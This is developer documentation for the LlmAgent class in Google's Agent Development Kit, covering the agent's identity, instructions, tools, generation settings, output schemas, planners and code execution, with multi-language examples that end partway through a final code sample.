Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

The `LlmAgent` (often aliased simply as `Agent`) is a core component in ADK, acting as the "thinking" part of your application. It leverages the power of a Large Language Model (LLM) for reasoning, understanding natural language, making decisions, generating responses, and interacting with tools.

Unlike deterministic [Workflow Agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md) that follow predefined execution paths, `LlmAgent` behavior is non-deterministic. It uses the LLM to interpret instructions and context, deciding dynamically how to proceed, which tools to use (if any), or whether to transfer control to another agent.

Building an effective `LlmAgent` involves defining its identity, clearly guiding its behavior through instructions, and equipping it with the necessary tools and capabilities.
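The contrast drawn above between workflow agents and `LlmAgent` can be sketched in plain Python. This is a toy illustration rather than ADK code: `run_workflow`, `run_llm_style`, and `fake_model` are hypothetical names, and `fake_model` is a deterministic stub standing in for a real LLM, whose choices could vary from run to run.

```python
from typing import Callable, Dict, List

# Hypothetical stand-ins for illustration only; none of these names are part of ADK.
Step = Callable[[str], str]


def run_workflow(steps: List[Step], text: str) -> str:
    """Workflow style: every step runs, always in the listed order."""
    for step in steps:
        text = step(text)
    return text


def run_llm_style(decide: Callable[[str], str], tools: Dict[str, Step], text: str) -> str:
    """LLM style: `decide` (a stub for the model) picks a tool name or answers directly."""
    choice = decide(text)
    if choice in tools:
        return tools[choice](text)
    return text  # the "model" chose to respond without calling a tool


def trim(text: str) -> str:
    return text.strip()


def shout(text: str) -> str:
    return text.upper()


def fake_model(text: str) -> str:
    # A real LLM would weigh the instruction, tool descriptions, and conversation here.
    return "shout" if text.endswith("!") else "respond"


tools = {"trim": trim, "shout": shout}
fixed = run_workflow([trim, shout], "  hello ")
dynamic_tool = run_llm_style(fake_model, tools, "hello!")
dynamic_direct = run_llm_style(fake_model, tools, "hello")
```

In the first function the caller fixes the path in advance; in the second, the path depends on what the model returns for each input, which is the decision an `LlmAgent` delegates to the LLM.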
## Defining the Agent's Identity and Purpose

First, you need to establish what the agent *is* and what it's *for*.

- **`name` (Required):** Every agent needs a unique string identifier. This `name` is crucial for internal operations, especially in multi-agent systems where agents need to refer to or delegate tasks to each other. Choose a descriptive name that reflects the agent's function (e.g., `customer_support_router`, `billing_inquiry_agent`). Avoid reserved names like `user`.
- **`description` (Optional, Recommended for Multi-Agent):** Provide a concise summary of the agent's capabilities. This description is primarily used by *other* LLM agents to determine if they should route a task to this agent. Make it specific enough to differentiate it from peers (e.g., "Handles inquiries about current billing statements," not just "Billing agent").
- **`model` (Required):** Specify the underlying LLM that will power this agent's reasoning. This is a string identifier like `"gemini-2.5-flash"`. The choice of model impacts the agent's capabilities, cost, and performance. See the [Models](/adk-docs/agents/models/) page for available options and considerations.

```python
# Example: Defining the basic identity
capital_agent = LlmAgent(
    model="gemini-2.5-flash",
    name="capital_agent",
    description="Answers user questions about the capital city of a given country."
    # instruction and tools will be added next
)
```

```typescript
// Example: Defining the basic identity
const capitalAgent = new LlmAgent({
    model: 'gemini-2.5-flash',
    name: 'capital_agent',
    description: 'Answers user questions about the capital city of a given country.',
    // instruction and tools will be added next
});
```

```go
// Example: Defining the basic identity
agent, err := llmagent.New(llmagent.Config{
	Name:        "capital_agent",
	Model:       model,
	Description: "Answers user questions about the capital city of a given country.",
	// instruction and tools will be added next
})
```

```java
// Example: Defining the basic identity
LlmAgent capitalAgent =
    LlmAgent.builder()
        .model("gemini-2.5-flash")
        .name("capital_agent")
        .description("Answers user questions about the capital city of a given country.")
        // instruction and tools will be added next
        .build();
```

## Guiding the Agent: Instructions (`instruction`)

The `instruction` parameter is arguably the most critical for shaping an `LlmAgent`'s behavior. It's a string (or a function returning a string) that tells the agent:

- Its core task or goal.
- Its personality or persona (e.g., "You are a helpful assistant," "You are a witty pirate").
- Constraints on its behavior (e.g., "Only answer questions about X," "Never reveal Y").
- How and when to use its `tools`. You should explain the purpose of each tool and the circumstances under which it should be called, supplementing any descriptions within the tool itself.
- The desired format for its output (e.g., "Respond in JSON," "Provide a bulleted list").

**Tips for Effective Instructions:**

- **Be Clear and Specific:** Avoid ambiguity. Clearly state the desired actions and outcomes.
- **Use Markdown:** Improve readability for complex instructions using headings, lists, etc.
- **Provide Examples (Few-Shot):** For complex tasks or specific output formats, include examples directly in the instruction.
- **Guide Tool Use:** Don't just list tools; explain *when* and *why* the agent should use them.

**State:**

- The instruction is a string template; you can use the `{var}` syntax to insert dynamic values into it.
- `{var}` inserts the value of the state variable named `var`.
- `{artifact.var}` inserts the text content of the artifact named `var`.
- If the state variable or artifact does not exist, the agent raises an error. To ignore a missing value instead, append a `?` to the variable name, as in `{var?}`.

```python
# Example: Adding instructions
capital_agent = LlmAgent(
    model="gemini-2.5-flash",
    name="capital_agent",
    description="Answers user questions about the capital city of a given country.",
    instruction="""You are an agent that provides the capital city of a country.
When a user asks for the capital of a country:
1. Identify the country name from the user's query.
2. Use the `get_capital_city` tool to find the capital.
3. Respond clearly to the user, stating the capital city.
Example Query: "What's the capital of {country}?"
Example Response: "The capital of France is Paris."
""",
    # tools will be added next
)
```

```typescript
// Example: Adding instructions
const capitalAgent = new LlmAgent({
    model: 'gemini-2.5-flash',
    name: 'capital_agent',
    description: 'Answers user questions about the capital city of a given country.',
    instruction: `You are an agent that provides the capital city of a country.
When a user asks for the capital of a country:
1. Identify the country name from the user's query.
2. Use the \`getCapitalCity\` tool to find the capital.
3. Respond clearly to the user, stating the capital city.
Example Query: "What's the capital of {country}?"
Example Response: "The capital of France is Paris."
`,
    // tools will be added next
});
```

```go
// Example: Adding instructions
agent, err := llmagent.New(llmagent.Config{
	Name:        "capital_agent",
	Model:       model,
	Description: "Answers user questions about the capital city of a given country.",
	Instruction: `You are an agent that provides the capital city of a country.
When a user asks for the capital of a country:
1. Identify the country name from the user's query.
2. Use the 'get_capital_city' tool to find the capital.
3. Respond clearly to the user, stating the capital city.
Example Query: "What's the capital of {country}?"
Example Response: "The capital of France is Paris."`,
	// tools will be added next
})
```

```java
// Example: Adding instructions
LlmAgent capitalAgent =
    LlmAgent.builder()
        .model("gemini-2.5-flash")
        .name("capital_agent")
        .description("Answers user questions about the capital city of a given country.")
        .instruction(
            """
            You are an agent that provides the capital city of a country.
            When a user asks for the capital of a country:
            1. Identify the country name from the user's query.
            2. Use the `get_capital_city` tool to find the capital.
            3. Respond clearly to the user, stating the capital city.
            Example Query: "What's the capital of {country}?"
            Example Response: "The capital of France is Paris."
            """)
        // tools will be added next
        .build();
```

*(Note: For instructions that apply to* all *agents in a system, consider using `global_instruction` on the root agent, detailed further in the [Multi-Agents](https://google.github.io/adk-docs/agents/multi-agents/index.md) section.)*

## Equipping the Agent: Tools (`tools`)

Tools give your `LlmAgent` capabilities beyond the LLM's built-in knowledge or reasoning. They allow the agent to interact with the outside world, perform calculations, fetch real-time data, or execute specific actions.

- **`tools` (Optional):** Provide a list of tools the agent can use. Each item in the list can be:
  - A native function or method (wrapped as a `FunctionTool`).
    Python ADK automatically wraps a native function in a `FunctionTool`, whereas in Java you must explicitly wrap your methods using `FunctionTool.create(...)`.
  - An instance of a class inheriting from `BaseTool`.
  - An instance of another agent (`AgentTool`, enabling agent-to-agent delegation - see [Multi-Agents](https://google.github.io/adk-docs/agents/multi-agents/index.md)).

The LLM uses the function/tool names, descriptions (from docstrings or the `description` field), and parameter schemas to decide which tool to call based on the conversation and its instructions.

```python
# Define a tool function
def get_capital_city(country: str) -> str:
    """Retrieves the capital city for a given country."""
    # Replace with actual logic (e.g., API call, database lookup)
    capitals = {"france": "Paris", "japan": "Tokyo", "canada": "Ottawa"}
    return capitals.get(country.lower(), f"Sorry, I don't know the capital of {country}.")

# Add the tool to the agent
capital_agent = LlmAgent(
    model="gemini-2.5-flash",
    name="capital_agent",
    description="Answers user questions about the capital city of a given country.",
    instruction="""You are an agent that provides the capital city of a country... (previous instruction text)""",
    tools=[get_capital_city] # Provide the function directly
)
```

```typescript
import {z} from 'zod';
import { LlmAgent, FunctionTool } from '@google/adk';

// Define the schema for the tool's input parameters
const getCapitalCityParamsSchema = z.object({
    country: z.string().describe('The country to get capital for.'),
});

// Define the tool function itself
async function getCapitalCity(params: z.infer<typeof getCapitalCityParamsSchema>): Promise<{ capitalCity: string }> {
    const capitals: Record<string, string> = {
        'france': 'Paris',
        'japan': 'Tokyo',
        'canada': 'Ottawa',
    };
    const result = capitals[params.country.toLowerCase()] ??
`Sorry, I don't know the capital of ${params.country}.`; return {capitalCity: result}; // Tools must return an object } // Create an instance of the FunctionTool const getCapitalCityTool = new FunctionTool({ name: 'getCapitalCity', description: 'Retrieves the capital city for a given country.', parameters: getCapitalCityParamsSchema, execute: getCapitalCity, }); // Add the tool to the agent const capitalAgent = new LlmAgent({ model: 'gemini-2.5-flash', name: 'capitalAgent', description: 'Answers user questions about the capital city of a given country.', instruction: 'You are an agent that provides the capital city of a country...', // Note: the full instruction is omitted for brevity tools: [getCapitalCityTool], // Provide the FunctionTool instance in an array }); ``` ```go // Define a tool function type getCapitalCityArgs struct { Country string `json:"country" jsonschema:"The country to get the capital of."` } getCapitalCity := func(ctx tool.Context, args getCapitalCityArgs) (map[string]any, error) { // Replace with actual logic (e.g., API call, database lookup) capitals := map[string]string{"france": "Paris", "japan": "Tokyo", "canada": "Ottawa"} capital, ok := capitals[strings.ToLower(args.Country)] if !ok { return nil, fmt.Errorf("Sorry, I don't know the capital of %s.", args.Country) } return map[string]any{"result": capital}, nil } // Add the tool to the agent capitalTool, err := functiontool.New( functiontool.Config{ Name: "get_capital_city", Description: "Retrieves the capital city for a given country.", }, getCapitalCity, ) if err != nil { log.Fatal(err) } agent, err := llmagent.New(llmagent.Config{ Name: "capital_agent", Model: model, Description: "Answers user questions about the capital city of a given country.", Instruction: "You are an agent that provides the capital city of a country... (previous instruction text)", Tools: []tool.Tool{capitalTool}, }) ``` ```java // Define a tool function // Retrieves the capital city of a given country. 
public static Map<String, String> getCapitalCity( @Schema(name = "country", description = "The country to get capital for") String country) { // Replace with actual logic (e.g., API call, database lookup) Map<String, String> countryCapitals = new HashMap<>(); countryCapitals.put("canada", "Ottawa"); countryCapitals.put("france", "Paris"); countryCapitals.put("japan", "Tokyo"); String result = countryCapitals.getOrDefault( country.toLowerCase(), "Sorry, I couldn't find the capital for " + country + "."); return Map.of("result", result); // Tools must return a Map } // Add the tool to the agent // `experiment` is assumed to be an instance of the class that declares getCapitalCity FunctionTool capitalTool = FunctionTool.create(experiment.getClass(), "getCapitalCity"); LlmAgent capitalAgent = LlmAgent.builder() .model("gemini-2.5-flash") .name("capital_agent") .description("Answers user questions about the capital city of a given country.") .instruction("You are an agent that provides the capital city of a country... (previous instruction text)") .tools(capitalTool) // Provide the function wrapped as a FunctionTool .build(); ``` Learn more about Tools in [Custom Tools](/adk-docs/tools-custom/). ## Advanced Configuration & Control Beyond the core parameters, `LlmAgent` offers several options for finer control: ### Fine-Tuning LLM Generation (`generate_content_config`) You can adjust how the underlying LLM generates responses using `generate_content_config`. - **`generate_content_config` (Optional):** Pass an instance of [`google.genai.types.GenerateContentConfig`](https://googleapis.github.io/python-genai/genai.html#genai.types.GenerateContentConfig) to control parameters like `temperature` (randomness), `max_output_tokens` (response length), `top_p`, `top_k`, and safety settings. ```python from google.genai import types agent = LlmAgent( # ...
other params generate_content_config=types.GenerateContentConfig( temperature=0.2, # More deterministic output max_output_tokens=250, safety_settings=[ types.SafetySetting( category=types.HarmCategory.HARM_CATEGORY_DANGEROUS_CONTENT, threshold=types.HarmBlockThreshold.BLOCK_LOW_AND_ABOVE, ) ] ) ) ``` ```typescript import { GenerateContentConfig } from '@google/genai'; const generateContentConfig: GenerateContentConfig = { temperature: 0.2, // More deterministic output maxOutputTokens: 250, }; const agent = new LlmAgent({ // ... other params generateContentConfig, }); ``` ```go import "google.golang.org/genai" temperature := float32(0.2) agent, err := llmagent.New(llmagent.Config{ Name: "gen_config_agent", Model: model, GenerateContentConfig: &genai.GenerateContentConfig{ Temperature: &temperature, MaxOutputTokens: 250, }, }) ``` ```java import com.google.genai.types.GenerateContentConfig; LlmAgent agent = LlmAgent.builder() // ... other params .generateContentConfig(GenerateContentConfig.builder() .temperature(0.2F) // More deterministic output .maxOutputTokens(250) .build()) .build(); ``` ### Structuring Data (`input_schema`, `output_schema`, `output_key`) For scenarios requiring structured data exchange with an `LlmAgent`, ADK provides mechanisms to define the expected input and desired output formats using schema definitions. - **`input_schema` (Optional):** Define a schema representing the expected input structure. If set, the user message content passed to this agent *must* be a JSON string conforming to this schema. Your instructions should guide the user or preceding agent accordingly. - **`output_schema` (Optional):** Define a schema representing the desired output structure. If set, the agent's final response *must* be a JSON string conforming to this schema. - **`output_key` (Optional):** Provide a string key. If set, the text content of the agent's *final* response will be automatically saved to the session's state dictionary under this key.
This is useful for passing results between agents or steps in a workflow. - In Python, this might look like: `session.state[output_key] = agent_response_text` - In Java: `session.state().put(outputKey, agentResponseText)` - In Go, within a callback handler: `ctx.State().Set(output_key, agentResponseText)` In Python, the input and output schemas are typically Pydantic `BaseModel` classes. ```python from pydantic import BaseModel, Field class CapitalOutput(BaseModel): capital: str = Field(description="The capital of the country.") structured_capital_agent = LlmAgent( # ... name, model, description instruction="""You are a Capital Information Agent. Given a country, respond ONLY with a JSON object containing the capital. Format: {"capital": "capital_name"}""", output_schema=CapitalOutput, # Enforce JSON output output_key="found_capital" # Store result in state['found_capital'] # Cannot use tools=[get_capital_city] effectively here ) ``` ```typescript import { LlmAgent } from '@google/adk'; import { Schema, Type } from '@google/genai'; // Define the schema for the output const CapitalOutputSchema: Schema = { type: Type.OBJECT, properties: { capital: { type: Type.STRING, description: 'The capital of the country.', }, }, required: ['capital'], }; // Create the LlmAgent instance const structuredCapitalAgent = new LlmAgent({ // ... name, model, description instruction: `You are a Capital Information Agent. Given a country, respond ONLY with a JSON object containing the capital. Format: {"capital": "capital_name"}`, outputSchema: CapitalOutputSchema, // Enforce JSON output outputKey: 'found_capital', // Store result in state['found_capital'] // Cannot use tools effectively here }); ``` In Go, the input and output schemas are `genai.Schema` objects.
```go capitalOutput := &genai.Schema{ Type: genai.TypeObject, Description: "Schema for capital city information.", Properties: map[string]*genai.Schema{ "capital": { Type: genai.TypeString, Description: "The capital city of the country.", }, }, } agent, err := llmagent.New(llmagent.Config{ Name: "structured_capital_agent", Model: model, Description: "Provides capital information in a structured format.", Instruction: `You are a Capital Information Agent. Given a country, respond ONLY with a JSON object containing the capital. Format: {"capital": "capital_name"}`, OutputSchema: capitalOutput, OutputKey: "found_capital", // Cannot use the capitalTool tool effectively here }) ``` In Java, the input and output schemas are `com.google.genai.types.Schema` objects. ```java private static final Schema CAPITAL_OUTPUT = Schema.builder() .type("OBJECT") .description("Schema for capital city information.") .properties( Map.of( "capital", Schema.builder() .type("STRING") .description("The capital city of the country.") .build())) .build(); LlmAgent structuredCapitalAgent = LlmAgent.builder() // ... name, model, description .instruction( "You are a Capital Information Agent. Given a country, respond ONLY with a JSON object containing the capital. Format: {\"capital\": \"capital_name\"}") .outputSchema(CAPITAL_OUTPUT) // Enforce JSON output .outputKey("found_capital") // Store result in state.get("found_capital") // Cannot use tools(getCapitalCity) effectively here .build(); ``` ### Managing Context (`include_contents`) Control whether the agent receives the prior conversation history. - **`include_contents` (Optional, Default: `'default'`):** Determines if the `contents` (history) are sent to the LLM. - `'default'`: The agent receives the relevant conversation history. - `'none'`: The agent receives no prior `contents`. It operates based solely on its current instruction and any input provided in the *current* turn (useful for stateless tasks or enforcing specific contexts).
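As a rough mental model of the two settings, the following plain-Python sketch may help. It is a conceptual illustration only, not ADK's implementation: `build_request_contents` and the message dictionaries are hypothetical names introduced here, and ADK's actual selection of "relevant" history under `'default'` is more involved than simple concatenation.

```python
from typing import Literal

# Hypothetical message shape used only for this illustration.
Message = dict[str, str]


def build_request_contents(
    history: list[Message],
    current_turn: Message,
    include_contents: Literal["default", "none"] = "default",
) -> list[Message]:
    """Return the messages that would accompany the instruction for this turn."""
    if include_contents == "none":
        # Stateless: ignore everything said earlier in the session.
        return [current_turn]
    # Default: prior history followed by the current turn.
    return [*history, current_turn]


history = [
    {"role": "user", "text": "What's the capital of France?"},
    {"role": "model", "text": "The capital of France is Paris."},
]
current = {"role": "user", "text": "And of Japan?"}

with_history = build_request_contents(history, current)
stateless = build_request_contents(history, current, "none")

print(len(with_history))  # 3
print(len(stateless))     # 1
```

With `'none'`, a follow-up such as "And of Japan?" loses the context that makes it answerable, which is why this setting suits self-contained tasks. In ADK itself, the setting is a single parameter on the agent: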
```python stateless_agent = LlmAgent( # ... other params include_contents='none' ) ``` ```typescript const statelessAgent = new LlmAgent({ // ... other params includeContents: 'none', }); ``` ```go import "google.golang.org/adk/agent/llmagent" agent, err := llmagent.New(llmagent.Config{ Name: "stateless_agent", Model: model, IncludeContents: llmagent.IncludeContentsNone, }) ``` ```java import com.google.adk.agents.LlmAgent.IncludeContents; LlmAgent statelessAgent = LlmAgent.builder() // ... other params .includeContents(IncludeContents.NONE) .build(); ``` ### Planner Supported in ADK: Python v0.1.0 **`planner` (Optional):** Assign a `BasePlanner` instance to enable multi-step reasoning and planning before execution. There are two main planners: - **`BuiltInPlanner`:** Leverages the model's built-in planning capabilities (e.g., Gemini's thinking feature). See [Gemini Thinking](https://ai.google.dev/gemini-api/docs/thinking) for details and examples. Here, the `thinking_budget` parameter guides the model on the number of thinking tokens to use when generating a response. The `include_thoughts` parameter controls whether the model should include its raw thoughts and internal reasoning process in the response. ```python from google.adk import Agent from google.adk.planners import BuiltInPlanner from google.genai import types my_agent = Agent( model="gemini-2.5-flash", planner=BuiltInPlanner( thinking_config=types.ThinkingConfig( include_thoughts=True, thinking_budget=1024, ) ), # ... your tools here ) ``` - **`PlanReActPlanner`:** This planner instructs the model to follow a specific structure in its output: first create a plan, then execute actions (like calling tools), and provide reasoning for its steps. *It's particularly useful for models that don't have a built-in "thinking" feature*. ```python from google.adk import Agent from google.adk.planners import PlanReActPlanner my_agent = Agent( model="gemini-2.5-flash", planner=PlanReActPlanner(), # ...
your tools here ) ``` The agent's response will follow a structured format: ```text [user]: ai news [google_search_agent]: /*PLANNING*/ 1. Perform a Google search for "latest AI news" to get current updates and headlines related to artificial intelligence. 2. Synthesize the information from the search results to provide a summary of recent AI news. /*ACTION*/ /*REASONING*/ The search results provide a comprehensive overview of recent AI news, covering various aspects like company developments, research breakthroughs, and applications. I have enough information to answer the user's request. /*FINAL_ANSWER*/ Here's a summary of recent AI news: .... ``` Example for using built-in-planner: ```python from dotenv import load_dotenv import asyncio import os from google.genai import types from google.adk.agents.llm_agent import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.artifacts.in_memory_artifact_service import InMemoryArtifactService # Optional from google.adk.planners import BasePlanner, BuiltInPlanner, PlanReActPlanner from google.adk.models import LlmRequest from google.genai.types import ThinkingConfig from google.genai.types import GenerateContentConfig import datetime from zoneinfo import ZoneInfo APP_NAME = "weather_app" USER_ID = "1234" SESSION_ID = "session1234" def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } def get_current_time(city: str) -> dict: """Returns the current time in a specified city. 
Args: city (str): The name of the city for which to retrieve the current time. Returns: dict: status and result or error msg. """ if city.lower() == "new york": tz_identifier = "America/New_York" else: return { "status": "error", "error_message": ( f"Sorry, I don't have timezone information for {city}." ), } tz = ZoneInfo(tz_identifier) now = datetime.datetime.now(tz) report = ( f'The current time in {city} is {now.strftime("%Y-%m-%d %H:%M:%S %Z%z")}' ) return {"status": "success", "report": report} # Step 1: Create a ThinkingConfig thinking_config = ThinkingConfig( include_thoughts=True, # Ask the model to include its thoughts in the response thinking_budget=256 # Limit the 'thinking' to 256 tokens (adjust as needed) ) print("ThinkingConfig:", thinking_config) # Step 2: Instantiate BuiltInPlanner planner = BuiltInPlanner( thinking_config=thinking_config ) print("BuiltInPlanner created.") # Step 3: Wrap the planner in an LlmAgent agent = LlmAgent( model="gemini-2.5-pro-preview-03-25", # Set your model name name="weather_and_time_agent", instruction="You are an agent that returns time and weather", planner=planner, tools=[get_weather, get_current_time] ) # Session and Runner session_service = InMemorySessionService() # create_session is a coroutine (as in the code execution example below), so run it to completion session = asyncio.run(session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID)) runner = Runner(agent=agent, app_name=APP_NAME, session_service=session_service) # Agent Interaction def call_agent(query): content = types.Content(role='user', parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) for event in events: print(f"\nDEBUG EVENT: {event}\n") if event.is_final_response() and event.content: final_answer = event.content.parts[0].text.strip() print("\n🟢 FINAL ANSWER\n", final_answer, "\n") call_agent("If it's raining in New York right now, what is the current temperature?") ``` ### Code Execution Supported in ADK: Python v0.1.0, Java v0.1.0 - **`code_executor` (Optional):**
Provide a `BaseCodeExecutor` instance to allow the agent to execute code blocks found in the LLM's response. For more information, see [Code Execution with Gemini API](/adk-docs/tools/gemini-api/code-execution/). ````python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.code_executors import BuiltInCodeExecutor from google.genai import types AGENT_NAME = "calculator_agent" APP_NAME = "calculator" USER_ID = "user1234" SESSION_ID = "session_code_exec_async" GEMINI_MODEL = "gemini-2.0-flash" # Agent Definition code_agent = LlmAgent( name=AGENT_NAME, model=GEMINI_MODEL, code_executor=BuiltInCodeExecutor(), instruction="""You are a calculator agent. When given a mathematical expression, write and execute Python code to calculate the result. Return only the final numerical result as plain text, without markdown or code blocks. 
""", description="Executes Python code to perform calculations.", ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run(session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID )) runner = Runner(agent=code_agent, app_name=APP_NAME, session_service=session_service) # Agent Interaction (Async) async def call_agent_async(query): content = types.Content(role="user", parts=[types.Part(text=query)]) print(f"\n--- Running Query: {query} ---") final_response_text = "No final text response captured." try: # Use run_async async for event in runner.run_async( user_id=USER_ID, session_id=SESSION_ID, new_message=content ): print(f"Event ID: {event.id}, Author: {event.author}") # --- Check for specific parts FIRST --- has_specific_part = False if event.content and event.content.parts: for part in event.content.parts: # Iterate through all parts if part.executable_code: # Access the actual code string via .code print( f" Debug: Agent generated code:\n```python\n{part.executable_code.code}\n```" ) has_specific_part = True elif part.code_execution_result: # Access outcome and output correctly print( f" Debug: Code Execution Result: {part.code_execution_result.outcome} - Output:\n{part.code_execution_result.output}" ) has_specific_part = True # Also print any text parts found in any event for debugging elif part.text and not part.text.isspace(): print(f" Text: '{part.text.strip()}'") # Do not set has_specific_part=True here, as we want the final response logic below # --- Check for final response AFTER specific parts --- # Only consider it final if it doesn't have the specific code parts we just handled if not has_specific_part and event.is_final_response(): if ( event.content and event.content.parts and event.content.parts[0].text ): final_response_text = event.content.parts[0].text.strip() print(f"==> Final Agent Response: {final_response_text}") else: print( "==> Final Agent Response: [No text content in final 
event]") except Exception as e: print(f"ERROR during agent run: {e}") print("-" * 30) # Main async function to run the examples async def main(): await call_agent_async("Calculate the value of (5 + 7) * 3") await call_agent_async("What is 10 factorial?") # Execute the main async function try: asyncio.run(main()) except RuntimeError as e: # Handle specific error when running asyncio.run in an already running loop (like Jupyter/Colab) if "cannot be called from a running event loop" in str(e): print("\nRunning in an existing event loop (like Colab/Jupyter).") print("Please run `await main()` in a notebook cell instead.") # If in an interactive environment like a notebook, you might need to run: # await main() else: raise e # Re-raise other runtime errors ```` ````java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.BuiltInCodeExecutionTool; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; public class CodeExecutionAgentApp { private static final String AGENT_NAME = "calculator_agent"; private static final String APP_NAME = "calculator"; private static final String USER_ID = "user1234"; private static final String SESSION_ID = "session_code_exec_sync"; private static final String GEMINI_MODEL = "gemini-2.0-flash"; /** * Calls the agent with a query and prints the interaction events and final response. * * @param runner The runner instance for the agent. * @param query The query to send to the agent. 
*/ public static void callAgent(Runner runner, String query) { Content content = Content.builder().role("user").parts(ImmutableList.of(Part.fromText(query))).build(); InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService(); Session session = sessionService .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID) .blockingGet(); System.out.println("\n--- Running Query: " + query + " ---"); final String[] finalResponseText = {"No final text response captured."}; try { runner .runAsync(session.userId(), session.id(), content) .forEach( event -> { System.out.println("Event ID: " + event.id() + ", Author: " + event.author()); boolean hasSpecificPart = false; if (event.content().isPresent() && event.content().get().parts().isPresent()) { for (Part part : event.content().get().parts().get()) { if (part.executableCode().isPresent()) { System.out.println( " Debug: Agent generated code:\n```python\n" + part.executableCode().get().code() + "\n```"); hasSpecificPart = true; } else if (part.codeExecutionResult().isPresent()) { System.out.println( " Debug: Code Execution Result: " + part.codeExecutionResult().get().outcome() + " - Output:\n" + part.codeExecutionResult().get().output()); hasSpecificPart = true; } else if (part.text().isPresent() && !part.text().get().trim().isEmpty()) { System.out.println(" Text: '" + part.text().get().trim() + "'"); } } } if (!hasSpecificPart && event.finalResponse()) { if (event.content().isPresent() && event.content().get().parts().isPresent() && !event.content().get().parts().get().isEmpty() && event.content().get().parts().get().get(0).text().isPresent()) { finalResponseText[0] = event.content().get().parts().get().get(0).text().get().trim(); System.out.println("==> Final Agent Response: " + finalResponseText[0]); } else { System.out.println( "==> Final Agent Response: [No text content in final event]"); } } }); } catch (Exception e) { System.err.println("ERROR during agent run: " + e.getMessage()); 
e.printStackTrace(); } System.out.println("------------------------------"); } public static void main(String[] args) { BuiltInCodeExecutionTool codeExecutionTool = new BuiltInCodeExecutionTool(); BaseAgent codeAgent = LlmAgent.builder() .name(AGENT_NAME) .model(GEMINI_MODEL) .tools(ImmutableList.of(codeExecutionTool)) .instruction( """ You are a calculator agent. When given a mathematical expression, write and execute Python code to calculate the result. Return only the final numerical result as plain text, without markdown or code blocks. """) .description("Executes Python code to perform calculations.") .build(); InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(codeAgent, APP_NAME, null, sessionService); callAgent(runner, "Calculate the value of (5 + 7) * 3"); callAgent(runner, "What is 10 factorial?"); } } ```` ## Putting It Together: Example Code Here's the complete basic `capital_agent`: ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # --- Full example code demonstrating LlmAgent with Tools vs. Output Schema --- import json # Needed for pretty printing dicts import asyncio from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types from pydantic import BaseModel, Field # --- 1. 
Define Constants --- APP_NAME = "agent_comparison_app" USER_ID = "test_user_456" SESSION_ID_TOOL_AGENT = "session_tool_agent_xyz" SESSION_ID_SCHEMA_AGENT = "session_schema_agent_xyz" MODEL_NAME = "gemini-2.0-flash" # --- 2. Define Schemas --- # Input schema used by both agents class CountryInput(BaseModel): country: str = Field(description="The country to get information about.") # Output schema ONLY for the second agent class CapitalInfoOutput(BaseModel): capital: str = Field(description="The capital city of the country.") # Note: Population is illustrative; the LLM will infer or estimate this # as it cannot use tools when output_schema is set. population_estimate: str = Field(description="An estimated population of the capital city.") # --- 3. Define the Tool (Only for the first agent) --- def get_capital_city(country: str) -> str: """Retrieves the capital city of a given country.""" print(f"\n-- Tool Call: get_capital_city(country='{country}') --") country_capitals = { "united states": "Washington, D.C.", "canada": "Ottawa", "france": "Paris", "japan": "Tokyo", } result = country_capitals.get(country.lower(), f"Sorry, I couldn't find the capital for {country}.") print(f"-- Tool Result: '{result}' --") return result # --- 4. Configure Agents --- # Agent 1: Uses a tool and output_key capital_agent_with_tool = LlmAgent( model=MODEL_NAME, name="capital_agent_tool", description="Retrieves the capital city using a specific tool.", instruction="""You are a helpful agent that provides the capital city of a country using a tool. The user will provide the country name in a JSON format like {"country": "country_name"}. 1. Extract the country name. 2. Use the `get_capital_city` tool to find the capital. 3. Respond clearly to the user, stating the capital city found by the tool. 
